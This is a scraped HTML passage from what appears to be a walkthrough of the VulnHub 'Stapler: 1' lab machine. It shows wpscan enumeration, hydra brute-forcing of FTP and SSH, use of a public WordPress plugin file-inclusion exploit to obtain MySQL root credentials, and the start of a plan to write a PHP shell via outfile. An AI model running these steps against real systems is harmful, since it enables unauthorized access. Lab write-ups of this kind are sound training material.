data-original=\"https:\/\/miro.medium.com\/max\/45\/1*bs-kq0vFyzAzSBzuoZm4rA.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1668\" height=\"873\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe73\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe73\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"1668\" height=\"873\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"c764\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Read through every post.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev aiw\">\n<div class=\"kc s ao kd\">\n<div class=\"aix kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*jSQgUALxt2YqwJ9PxmeDpA.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1293\" height=\"451\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe74\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe74\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"1293\" height=\"451\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev aiy\">\n<div class=\"kc s ao kd\">\n<div class=\"aiz kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*tkeIKDOVEJjTDFltmY1rJQ.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"874\" height=\"503\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe75\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe75\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"874\" height=\"503\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev aja\">\n<div class=\"kc s ao kd\">\n<div class=\"ajb kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*xrGvxl-ZUrTz2BTMvUM8Xg.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"830\" height=\"593\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe76\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe76\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"830\" height=\"593\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev ajc\">\n<div class=\"kc s ao kd\">\n<div class=\"ajd kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*FE6coLe83pNwGLGRC1fFzg.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"850\" height=\"613\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe77\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe77\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"850\" height=\"613\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"68e3\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Scan WordPress<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"9a20\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">wpscan --url https:\/\/10.0.2.31:12380\/blogblog\/ -et -ep -eu --disable-tls-checks<\/span><\/pre>\n<p id=\"a8ba\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">There\u2019s a list of users.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev aje\">\n<div class=\"kc s ao kd\">\n<div class=\"ajf kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*aliLtOA6I4WvaGmkarJNKg.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"981\" height=\"796\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe78\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe78\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"981\" height=\"796\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"1be7\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">save as \u2018users_wp.txt\u2019<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev ajg\">\n<div class=\"kc s ao kd\">\n<div class=\"ajh kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*UuhdFuC9AP8z0YukjgGUrQ.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"780\" height=\"275\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe79\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe79\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1170\/1*UuhdFuC9AP8z0YukjgGUrQ.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*UuhdFuC9AP8z0YukjgGUrQ.png 276w, https:\/\/miro.medium.com\/max\/828\/1*UuhdFuC9AP8z0YukjgGUrQ.png 552w, https:\/\/miro.medium.com\/max\/960\/1*UuhdFuC9AP8z0YukjgGUrQ.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*UuhdFuC9AP8z0YukjgGUrQ.png 700w\" width=\"780\" height=\"275\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe80\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe80\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"891b\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Scan for plugin<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"1747\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">wpscan --url <a class=\"ds li\" href=\"https:\/\/byy3.com\/go\/?url=https:\/\/10.0.2.31:12380\/blogblog\/\" rel=\"noopener nofollow\" rel=\"nofollow\" >https:\/\/10.0.2.31:12380\/blogblog\/<\/a> --disable-tls-checks --plugins-detection aggressive<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev aji\">\n<div class=\"kc s ao kd\">\n<div class=\"ajj kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*8e9wTJUzlDaSGkfah84qQg.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1344\" height=\"715\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe81\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe81\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/2016\/1*8e9wTJUzlDaSGkfah84qQg.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*8e9wTJUzlDaSGkfah84qQg.png 276w, https:\/\/miro.medium.com\/max\/828\/1*8e9wTJUzlDaSGkfah84qQg.png 552w, https:\/\/miro.medium.com\/max\/960\/1*8e9wTJUzlDaSGkfah84qQg.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*8e9wTJUzlDaSGkfah84qQg.png 700w\" width=\"1344\" height=\"715\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe82\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe82\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"13e6\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">I googled and came across this exploit code of \u2018advanced-video-embed-videos-or-playlists\u2019.<\/p>\n<div class=\"hc hd he hf hg hh\">\n<div class=\"hi n ab\">\n<div class=\"hj n ak p hk hl\">\n<h2 class=\"ba cz dn bc hm hn ho hp hq hr hs dk gj\">gtech\/39646<\/h2>\n<div class=\"ht s\">\n<h3 class=\"ba b dn bc hm hn ho hp hq hr hs by\">WordPress Plugin Advanced Video 1.0 - Local File Inclusion Update - gtech\/39646<\/h3>\n<\/div>\n<div class=\"hu s\">\n<p class=\"ba b hv bc hm hn ho hp hq hr hs by\">github.com<\/p>\n<\/div>\n<\/div>\n<div class=\"hw s\">\n<div class=\"ajk s hy hz ia hw ib ic hh\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<p id=\"ee88\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Read the script and edit it to match the target.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev ajl\">\n<div class=\"kc s ao kd\">\n<div class=\"ajm kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*hSkHxUBRCoai6vJiG9YDoQ.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1308\" height=\"666\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe83\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe83\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1962\/1*hSkHxUBRCoai6vJiG9YDoQ.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*hSkHxUBRCoai6vJiG9YDoQ.png 276w, https:\/\/miro.medium.com\/max\/828\/1*hSkHxUBRCoai6vJiG9YDoQ.png 552w, https:\/\/miro.medium.com\/max\/960\/1*hSkHxUBRCoai6vJiG9YDoQ.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*hSkHxUBRCoai6vJiG9YDoQ.png 700w\" width=\"1308\" height=\"666\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe84\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe84\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<\/div>\n<\/div>\n<\/section>\n<div class=\"n p cw kw kx ky\" role=\"separator\"><\/div>\n<section class=\"dm fi fj dh fk\">\n<div class=\"n p\">\n<div class=\"ap aq ar as at fl av w\">\n<p id=\"2e73\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\"><strong class=\"if cz\">Exploitation<\/strong><\/p>\n<ol class=\"\">\n<li id=\"9cd7\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja jb jc jd gj\" data-selectable-paragraph=\"\">FTP Port 21 \u2014 brute-forcing<\/li>\n<li id=\"00e6\" class=\"id ie fn if b ig afp ii ij ik afq im in io afr iq ir is afs iu iv iw aft iy iz ja jb jc jd gj\" data-selectable-paragraph=\"\">SSH Port 22 \u2014 brute-forcing<\/li>\n<li id=\"4829\" class=\"id ie fn if b ig afp ii ij ik afq im in io afr iq ir is afs iu iv iw aft iy iz ja jb jc jd gj\" data-selectable-paragraph=\"\">HTTP(S) Port 12380 \u2014 brute-forcing and public exploit<\/li>\n<\/ol>\n<p id=\"e5f4\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\"><em class=\"wq\">Start w\/ FTP Port 21 \u2014 brute-forcing<\/em><\/p>\n<p id=\"df39\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">I will use users.txt as username and password because some people use the same string to be username and password.<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"7176\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">hydra -L users.txt -P users.txt ftp:\/\/10.0.2.31<\/span><\/pre>\n<p id=\"7d62\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">I got the credential.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev ajn\">\n<div class=\"kc s ao kd\">\n<div class=\"ajo kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*MXqWovlRh0EJ9phn93KaRQ.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"958\" height=\"326\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe85\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe85\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1437\/1*MXqWovlRh0EJ9phn93KaRQ.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*MXqWovlRh0EJ9phn93KaRQ.png 276w, https:\/\/miro.medium.com\/max\/828\/1*MXqWovlRh0EJ9phn93KaRQ.png 552w, https:\/\/miro.medium.com\/max\/960\/1*MXqWovlRh0EJ9phn93KaRQ.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*MXqWovlRh0EJ9phn93KaRQ.png 700w\" width=\"958\" height=\"326\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe86\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe86\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"4c40\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">ftp 10.0.2.31<\/span><span id=\"9c53\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">username: SHayslett<\/span><span id=\"f6d1\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">password: SHayslett<\/span><span id=\"7997\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">ls -la<\/span><\/pre>\n<p id=\"1ce0\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Not much use right now<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev ajp\">\n<div class=\"kc s ao kd\">\n<div class=\"ajq kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*c9ImRDjDNrMLZoWhofo0ZA.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"902\" height=\"806\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe87\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe87\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"902\" height=\"806\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"48a9\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\"><em class=\"wq\">Next is SSH Port 22 \u2014 brute-forcing<\/em><\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"69a1\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">hydra -L users.txt -P users.txt 10.0.2.31 ssh -t 4 -u -F -V<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev ajr\">\n<div class=\"kc s ao kd\">\n<div class=\"ajs kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*SPSBq-XW1sELPe3iZiabIQ.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"929\" height=\"169\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe88\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe88\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"929\" height=\"169\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"1776\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Connect<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"e871\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">ssh SHayslett@10.0.2.31<\/span><\/pre>\n<p id=\"9a9f\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Now, I got the shell.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev ajt\">\n<div class=\"kc s ao kd\">\n<div class=\"aju kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*uKsuXfF5uM6hcwyGvA3Zyw.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"758\" height=\"220\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe89\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe89\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"758\" height=\"220\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"20f7\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\"><em class=\"wq\">Last one, HTTP(S) Port 12380 \u2014 brute-forcing and public exploit<\/em><\/p>\n<p id=\"d139\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Starting w\/ brute-forcing and leave it for a while.<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"24e0\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">wpscan --url <a class=\"ds li\" href=\"https:\/\/byy3.com\/go\/?url=https:\/\/10.0.2.31:12380\/blogblog\/\" rel=\"noopener nofollow\" rel=\"nofollow\" >https:\/\/10.0.2.31:12380\/blogblog\/<\/a> --disable-tls-checks -P ~\/Desktop\/rockyou.txt<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev ajv\">\n<div class=\"kc s ao kd\">\n<div class=\"ajw kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*DS7yIkCXEmFnCMRexQLfZw.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1843\" height=\"260\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe90\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe90\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/2765\/1*DS7yIkCXEmFnCMRexQLfZw.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*DS7yIkCXEmFnCMRexQLfZw.png 276w, https:\/\/miro.medium.com\/max\/828\/1*DS7yIkCXEmFnCMRexQLfZw.png 552w, https:\/\/miro.medium.com\/max\/960\/1*DS7yIkCXEmFnCMRexQLfZw.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*DS7yIkCXEmFnCMRexQLfZw.png 700w\" width=\"1843\" height=\"260\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe91\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe91\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"a14e\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Using public exploit<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"9a67\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">python 39646.py<\/span><\/pre>\n<p id=\"0809\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Now I got a MySQL credential.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev ajx\">\n<div class=\"kc s ao kd\">\n<div class=\"ajy kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*Pkuyzinf2wGAM6-lt4vySQ.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"955\" height=\"624\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe92\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe92\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1433\/1*Pkuyzinf2wGAM6-lt4vySQ.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*Pkuyzinf2wGAM6-lt4vySQ.png 276w, https:\/\/miro.medium.com\/max\/828\/1*Pkuyzinf2wGAM6-lt4vySQ.png 552w, https:\/\/miro.medium.com\/max\/960\/1*Pkuyzinf2wGAM6-lt4vySQ.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*Pkuyzinf2wGAM6-lt4vySQ.png 700w\" width=\"955\" height=\"624\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe93\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe93\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"857a\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">4. MySQL port 3306<\/p>\n<p id=\"9a2f\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Remote login w\/ root : plbkac<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"0b6d\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">mysql -h 10.0.2.31 -uroot -pplbkac<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev ajz\">\n<div class=\"kc s ao kd\">\n<div class=\"aka kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*QAr_fbgDB2iVuR5vU3odiQ.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"953\" height=\"242\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe94\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe94\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1430\/1*QAr_fbgDB2iVuR5vU3odiQ.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*QAr_fbgDB2iVuR5vU3odiQ.png 276w, https:\/\/miro.medium.com\/max\/828\/1*QAr_fbgDB2iVuR5vU3odiQ.png 552w, https:\/\/miro.medium.com\/max\/960\/1*QAr_fbgDB2iVuR5vU3odiQ.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*QAr_fbgDB2iVuR5vU3odiQ.png 700w\" width=\"953\" height=\"242\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe95\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe95\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"4c86\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">I\u2019ll create an outfile w\/ the content of PHP shell command.<\/p>\n<p id=\"2ba1\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Normally, I\u2019ll store the shell file within the WordPress site. So, the path probably 